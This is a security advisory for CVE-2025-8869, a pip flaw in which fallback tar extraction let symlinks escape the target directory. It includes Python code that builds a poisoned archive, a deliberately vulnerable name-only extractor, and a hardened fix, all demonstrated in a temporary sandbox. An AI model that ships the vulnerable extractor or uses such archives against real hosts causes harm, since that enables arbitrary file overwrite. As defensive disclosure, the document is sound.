CVE-2025-8869: pip's fallback tar extraction doesn't check symbolic links point to extraction directory
In the fallback extraction path for source distributions, pip used Python's tarfile module without verifying that symbolic/hard link targets resolve inside the intended extraction directory. The member names themselves were confined to the destination, but a link whose target pointed above it was created anyway, and a later member written through that link landed outside the tree. A malicious sdist can therefore include links that escape the target directory and overwrite arbitrary files on the invoking host during pip install. This fallback is only taken when the running interpreter's tarfile lacks the PEP 706 extraction filters; where filter="data" is available, pip extracts with it and the standard library rejects escaping link targets. Mitigation is to upgrade to a pip release containing the linked fix commit (see the pip changelog reference below), or to run pip on an interpreter whose tarfile supports extraction filters.
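The pattern the advisory describes, as an added example written for this page (not pip's code and not from the advisory): a constructed two-member tar that plants a symlink pointing above the extraction root and then a regular file of the same name, an extractor that confines member names only, the way the fallback path did, and a hardened extractor that also checks link targets and the real path of every write. The function names, the sandbox layout and the sample archive are assumptions made for the demonstration.

```python
import io
import os
import tarfile
import tempfile


def build_poisoned_tar() -> bytes:
    """Constructed sample archive shaped like a malicious sdist.

    Member 1: symlink 'pkg/escape' -> '../../outside.txt' (above the root).
    Member 2: regular file also named 'pkg/escape'. An extractor that only
    validates names creates the link, then opens 'pkg/escape' for writing,
    which follows the link and clobbers a file outside the destination.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        link = tarfile.TarInfo("pkg/escape")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside.txt"  # dest/pkg/../../ is dest's parent
        tf.addfile(link)
        data = b"owned\n"
        regular = tarfile.TarInfo("pkg/escape")
        regular.size = len(data)
        tf.addfile(regular, io.BytesIO(data))
    return buf.getvalue()


def _inside(root: str, candidate: str) -> bool:
    """Lexical containment check: normalised candidate sits under root."""
    root = os.path.abspath(root)
    candidate = os.path.abspath(candidate)
    return os.path.commonpath([root, candidate]) == root


def extract_name_check_only(tar_bytes: bytes, dest: str) -> None:
    """Model of the vulnerable pattern: names are confined to dest, link
    targets are never examined, and regular files are opened by path."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tf:
        for member in tf.getmembers():
            path = os.path.join(dest, member.name)
            if not _inside(dest, path):
                raise ValueError(f"member name escapes destination: {member.name}")
            os.makedirs(os.path.dirname(path), exist_ok=True)
            if member.issym():
                os.symlink(member.linkname, path)  # target goes unchecked
            elif member.isreg():
                with open(path, "wb") as fh:  # follows a planted symlink
                    fh.write(tf.extractfile(member).read())


def extract_checked(tar_bytes: bytes, dest: str) -> None:
    """Hardened variant: link targets must resolve inside dest, and the real
    path of every write target must too, so a planted link cannot redirect a
    later member. Equivalent in intent to tarfile's 'data' filter (PEP 706)."""
    real_dest = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tf:
        for member in tf.getmembers():
            path = os.path.join(dest, member.name)
            if not _inside(dest, path):
                raise ValueError(f"member name escapes destination: {member.name}")
            if member.issym() or member.islnk():
                # Symlink targets are relative to the link's directory; hard
                # link targets are member names relative to the archive root.
                base = os.path.dirname(path) if member.issym() else dest
                if not _inside(dest, os.path.join(base, member.linkname)):
                    raise ValueError(
                        f"link target escapes destination: {member.name} -> {member.linkname}")
            if not _inside(real_dest, os.path.realpath(path)):
                raise ValueError(f"write target resolves outside destination: {member.name}")
            os.makedirs(os.path.dirname(path), exist_ok=True)
            if member.issym():
                os.symlink(member.linkname, path)
            elif member.isreg():
                with open(path, "wb") as fh:
                    fh.write(tf.extractfile(member).read())


def demo() -> dict:
    """Run both extractors in a scratch tree: sandbox/victim is the extraction
    root, so a successful escape shows up as sandbox/outside.txt."""
    tar_bytes = build_poisoned_tar()
    result = {}
    with tempfile.TemporaryDirectory() as sandbox:
        dest = os.path.join(sandbox, "victim")
        os.makedirs(dest)
        extract_name_check_only(tar_bytes, dest)
        result["unsafe_escaped"] = os.path.isfile(os.path.join(sandbox, "outside.txt"))
    with tempfile.TemporaryDirectory() as sandbox:
        dest = os.path.join(sandbox, "victim")
        os.makedirs(dest)
        try:
            extract_checked(tar_bytes, dest)
            result["checked_raised"] = False
        except ValueError:
            result["checked_raised"] = True
        result["checked_escaped"] = os.path.isfile(os.path.join(sandbox, "outside.txt"))
    return result


if __name__ == "__main__":
    print(demo())
```

On an interpreter whose tarfile has extraction filters, the same archive fed to `TarFile.extractall(dest, filter="data")` is rejected by the standard library at the symlink member; the hand-written checks above matter only on interpreters without those filters, which is exactly where pip's fallback path runs.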
References
- github.com/advisories/GHSA-4xh5-x5gv-qwph
- github.com/pypa/pip
- github.com/pypa/pip/commit/f2b92314da012b9fffa36b3f3e67748a37ef464a
- github.com/pypa/pip/pull/13550
- mail.python.org/archives/list/security-announce@python.org/thread/IF5A3GCJY3VH7BVHJKOWOJFKTW7VFQEN
- nvd.nist.gov/vuln/detail/CVE-2025-8869
- pip.pypa.io/en/stable/news/